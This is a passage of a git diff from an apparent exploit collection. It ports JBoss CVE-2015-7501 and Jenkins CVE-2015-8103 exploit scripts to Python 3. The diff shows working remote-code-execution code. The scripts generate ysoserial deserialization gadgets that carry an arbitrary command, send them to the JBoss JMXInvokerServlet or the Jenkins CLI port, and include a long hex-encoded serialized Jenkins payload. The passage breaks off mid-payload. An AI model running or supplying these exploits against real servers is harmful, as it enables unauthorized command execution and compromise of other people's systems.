i in xrange(0,opts.num): + print('Scanning ' + args[0] + ' on port ' + str(opts.port)) + for i in range(0,opts.num): check(args[0], opts.port, opts.file, opts.quiet, opts.starttls) if __name__ == '__main__': diff --git a/CVE Exploits/JBoss CVE-2015-7501.py b/CVE Exploits/JBoss CVE-2015-7501.py index e82ad23..2ee8edc 100644 --- a/CVE Exploits/JBoss CVE-2015-7501.py +++ b/CVE Exploits/JBoss CVE-2015-7501.py @@ -3,6 +3,7 @@ # Jboss Java Deserialization RCE (CVE-2015-7501) # Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -36,26 +37,26 @@ else: ysoserial_path = args.ysoserial_path if ysoserial_path is None: - print '[-] Could not find ysoserial JAR file' + print('[-] Could not find ysoserial JAR file') sys.exit(1) if len(args.target.split(":")) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) if r.status_code == 200: - print '[+] Command executed successfully' + print('[+] Command executed successfully') diff --git a/CVE Exploits/Jenkins CVE-2015-8103.py b/CVE Exploits/Jenkins CVE-2015-8103.py index 5419470..804736c 100644 --- a/CVE Exploits/Jenkins CVE-2015-8103.py +++ b/CVE Exploits/Jenkins CVE-2015-8103.py @@ -4,6 +4,7 @@ #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -39,24 +40,24 @@ else: ysoserial_path = args.ysoserial_path if ysoserial_path is None: - print "[-] Could not find ysoserial JAR file" + print("[-] Could not find ysoserial JAR file") sys.exit(1) if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) host, port = args.target.split(':') -print '[*] Target IP: {}'.format(host) -print '[*] Target PORT: {}'.format(port) -print '\n' +print('[*] Target IP: {}'.format(host)) +print('[*] Target PORT: {}'.format(port)) +print('\n') -print '[*] Retrieving the Jenkins CLI port' +print('[*] Retrieving the Jenkins CLI port') #Query Jenkins over HTTP to find what port the CLI listener is on r = requests.get('{}://{}:{}'.format(args.proto, host, port)) cli_port = int(r.headers['X-Jenkins-CLI-Port']) @@ -64,24 +65,24 @@ cli_port = int(r.headers['X-Jenkins-CLI-Port']) #Open a socket to the CLI port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host, cli_port) -print '[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port) +print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port)) sock.connect(server_address) # Send headers headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74' -print '[*] Sending headers' +print('[*] Sending headers') sock.send(headers) data = sock.recv(1024) -print '[*] Received "{}"'.format(data) +print('[*] Received "{}"'.format(data)) if data.find('JENKINS REMOTING CAPACITY') == -1: data = sock.recv(1024) - print '[*] Received "{}"'.format(data) + print('[*] Received "{}"'.format(data)) payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command]) payload_b64 = base64.b64encode(payloadObj) payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\